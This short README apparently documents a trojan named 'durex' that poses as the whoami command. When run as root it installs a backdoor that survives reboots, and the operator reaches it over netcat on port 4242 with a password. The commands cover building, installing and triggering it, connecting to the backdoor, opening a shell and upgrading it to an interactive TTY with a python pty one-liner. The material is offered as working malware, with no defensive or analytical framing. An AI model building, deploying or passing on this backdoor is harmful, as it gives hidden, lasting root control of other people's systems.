A really simple trojan, disguised as whoami
- installs a backdoor when launched as root
- backdoor is accessible with
nc <INFECTED_MACHINE_IP> 4242 - rebooting doesn't remove the backdoor
# build durex
make
# install durex
make install
# check installation
make check
# uninstall backdoor
make reset
# launch and install backdoor
sudo ./durex
# launch and do nothing
./durex# connect with nc
nc localhost 4242
# input password (unicorn emoji)
🦄
# launch shell
shell
# enable xterm features
python -c "import pty;pty.spawn('/bin/bash')"
^Z
export term=XTERM
stty raw -echo; fg